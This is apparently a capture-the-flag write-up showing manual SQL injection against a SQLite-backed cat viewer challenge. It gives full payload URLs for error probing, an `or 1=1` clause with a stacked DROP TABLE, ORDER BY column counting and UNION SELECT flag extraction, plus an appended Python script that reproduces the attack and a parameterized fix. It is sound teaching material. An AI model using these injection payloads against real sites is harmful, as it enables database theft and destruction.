This is the first of the 3 web/cloud challenges.
First, this challenge was actually pretty difficult for me for 3 reasons. Firstly, SQLMap and automation were not allowed. I greatly respect this decision as it forces you to really understand the underlying metadata and processes at hand. However, I still attempted to use SQLMap, but was quickly rate limited, and instead of trying to battle their web application firewall, I decided to do what I could manually.
Secondly, I am not a developer or web app designer, so manually parsing a back-end database is not something I am fluent in. I was slightly disappointed by the number of people who just focused on using SQLMap and bypassing the WAF. While this is understandable, a lot of the write-ups that the community posted are seriously and clearly lacking a technical understanding of the parsing, payload and discovery methodologies at hand.
Thirdly, this competition is designed to be tackled by teams of individuals, where I was flying solo.
References:
Process at a high level
Enumeration
Error based testing
Drop tables
Determine column count
Dump flag
1. Enumeration
Reviewing our challenge and browsing to the link brings us to a redirect, which we can see in the image below. The primary observation is the index.php?cat=Shelton query parameter. A parameter that selects a record by name like this is indicative of a back-end datastore, whether SQL, NoSQL or a Redis-like key-value store.
From here I immediately attempted local file inclusion, which led me down a different path. You can see in the image below that when I ran my local file inclusion payload, there were 2 key pieces of information:
"like" - the SQL LIKE operator, which does pattern matching with wildcards (% for any run of characters, _ for a single character), so our input is landing inside a LIKE clause.
Our input was reflected back.
From here I spent some time thinking about where to go next rather than guessing. I wanted to do 2 things. Firstly, I wanted to try error-based testing to determine whether the error handling discloses any valuable information. Secondly, I wanted to test the LIKE behaviour, to see if inputting a single letter would yield all cat names that start with that character. To be totally honest, I don't know why I wanted to test the latter of the two, but it was a gut feeling.
I was able to successfully test the LIKE behaviour by shortening the parameter from Shelton to S, which returned all cats whose names start with S. That tells us the application appends a wildcard to our input before matching, since LIKE "S" on its own would only match a cat literally named S.
2. Error based testing
Next, I was able to derive results with error-based testing, as seen in the image below. This reveals some great information. Namely, the error shows the query is built around LIKE, which tells us our input sits inside a quoted string in the WHERE clause of a SELECT, exactly where a UNION SELECT can be appended once that string is closed. We can also see that our DBMS is revealed: SQLite3. These are very important, as they will be instrumental in crafting our query. We know that our payload has to follow SQLite3 syntax.
3. Drop tables
This was a false positive in the sense that the payload "worked": the `"or 1=1` clause returned rows, so the guessed table name cats looked plausible. The downside, however, is that we did not find the flag, and the table was not actually dropped either: the later payloads still SELECT from cats, and DROP TABLES is not valid SQLite syntax (the statement is DROP TABLE). Stacked statements after a `;` are also commonly discarded by drivers that prepare only the first statement, so the DROP most likely never ran. Although I was not totally sure why at this point, we had at least identified a candidate table name.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22or%201=1;%20drop%20tables%20cats;%20--
4. Determine Column Count
From here I wanted to figure out how many columns the query returns. This is important because a UNION SELECT only works when both sides have the same number of columns, so without a correct column count we won't be able to craft a proper payload. I utilized the website which is listed under the references section at the start of this blog in order to retrieve the payloads for column count identification.
The technique is the ORDER BY n-- payload: ordering by a column position is accepted as long as n is no larger than the number of columns in the SELECT, so we keep incrementing n until we get an error, which indeed triggers at 5, telling us the query has 4 columns.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22ORDER%20BY%201--
https://nessus-catviewer.chals.io/index.php?cat=shelton%22ORDER%20BY%202--
https://nessus-catviewer.chals.io/index.php?cat=shelton%22ORDER%20BY%203--
https://nessus-catviewer.chals.io/index.php?cat=shelton%22ORDER%20BY%204--
In this query we receive an error, which reveals that the SELECT against our cats table has 4 columns. Note that this is the column count of the query, not necessarily of the table; the table may hold more columns than the page selects, which is exactly why a flag column can hide there.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22ORDER%20BY%205--
5. Final Payload
First I attempted a UNION ALL SELECT, calling id four times, and I made an assumption that the table name was cats. When I crafted a payload that puts id in all four columns, we actually got a hit. Two SQLite leniencies are doing the work here: the `"` closes a double-quoted string literal (SQLite accepts double quotes for string literals when the text does not resolve to an identifier), and FROM 'cats' is accepted because SQLite treats a single-quoted string as an identifier where a table name is expected. Everything after the first `;` is discarded by a driver that prepares a single statement, which is why the trailing `;;` and any remainder of the original query do no harm.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22%20UNION%20ALL%20SELECT%20id,id,id,id%20FROM%20%27cats%27;;
From here, I attempted to escalate by selecting flag four times, which was certainly guesswork to a degree. That is unfortunate, as I do not like guesswork. While this did reveal the flag, I wanted to tighten things up.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22%20UNION%20ALL%20SELECT%20flag,flag,flag,flag%20FROM%20%27cats%27;;
Finally, I tightened things up by removing ALL and just using UNION SELECT, which gave us the flag almost right away: UNION removes duplicate rows, so the flag appears once instead of once per row of the cats table.
https://nessus-catviewer.chals.io/index.php?cat=shelton%22%20UNION%20SELECT%20flag,flag,flag,flag%20FROM%20%27cats%27;;
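As an added, runnable example that is not part of the original write-up (and not the challenge's actual code), the script below reconstructs the whole procedure from steps 1 to 5 against an in-memory SQLite3 database: the LIKE probe, the echoed error, the `or 1=1` bypass, the ORDER BY column count and the UNION SELECT dump, followed by the parameterized query that would have closed the hole. The schema, row contents, flag value and the trailing % wildcard in the query template are assumptions; the toy closes the string with a single quote where the real site needed a double quote (%22).

```python
import sqlite3

# Constructed stand-in for the challenge back end. Table and column names,
# the row contents and the flag are all assumptions: the real schema is never
# shown on the page. The table deliberately has five columns while the
# application's SELECT exposes only four, to show what ORDER BY really counts.
FLAG = "flag{constructed_example_flag}"


def build_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE cats ("
        "id INTEGER PRIMARY KEY, name TEXT, breed TEXT, color TEXT, flag TEXT)"
    )
    db.executemany(
        "INSERT INTO cats (name, breed, color, flag) VALUES (?, ?, ?, ?)",
        [
            ("Shelton", "tabby", "grey", FLAG),
            ("Simba", "maine coon", "orange", FLAG),
            ("Luna", "siamese", "cream", FLAG),
        ],
    )
    return db


def vulnerable_lookup(db, cat):
    """Toy version of the cat viewer: the `cat` parameter is concatenated into
    a quoted LIKE pattern with a trailing % wildcard (assumed, because "S"
    returned every cat starting with S), and on failure the raw SQLite error
    plus the query are echoed back, as the write-up's error-based test saw.
    The toy closes the string with ' where the real site needed " (%22)."""
    sql = f"SELECT id, name, breed, color FROM cats WHERE name LIKE '{cat}%'"
    try:
        return {"rows": db.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": f"SQLite3 error: {exc} -- in query: {sql}"}


def find_column_count(db, base="shelton", limit=20):
    """Step 4: raise ORDER BY n until SQLite complains that the term is out
    of range. The last accepted n is the width of the injected SELECT, which
    is what UNION must match; it is not the width of the underlying table."""
    for n in range(1, limit + 1):
        if vulnerable_lookup(db, f"{base}' ORDER BY {n}--")["error"]:
            return n - 1
    return None


def dump_flag(db, columns, use_all=False):
    """Step 5: close the string, UNION a SELECT of the same width against the
    guessed table, and comment out the template's trailing %' with --.
    UNION ALL keeps one flag row per cat; plain UNION collapses duplicates."""
    keyword = "UNION ALL" if use_all else "UNION"
    cols = ", ".join(["flag"] * columns)
    return vulnerable_lookup(db, f"shelton' {keyword} SELECT {cols} FROM cats--")["rows"]


def safe_lookup(db, cat):
    """Hardened form: bind the pattern as a parameter so quotes, UNION and
    comments in `cat` are just characters to match. LIKE wildcards typed by
    the user (% and _) are still honoured, which is a separate decision."""
    sql = "SELECT id, name, breed, color FROM cats WHERE name LIKE ?"
    return db.execute(sql, (cat + "%",)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("LIKE probe:", [r[1] for r in vulnerable_lookup(db, "S")["rows"]])
    print("error leak:", vulnerable_lookup(db, "'")["error"])
    width = find_column_count(db)
    print("columns:", width)
    print("UNION ALL:", dump_flag(db, width, use_all=True))
    print("UNION:", dump_flag(db, width))
    print("hardened:", safe_lookup(db, "shelton' UNION SELECT flag,flag,flag,flag FROM cats--"))
```

The `--` comment takes the place of the write-up's trailing `;;`: Python's sqlite3 module refuses anything after the first statement, whereas the challenge's driver evidently ignored it, so against an unknown target it is worth trying both terminators.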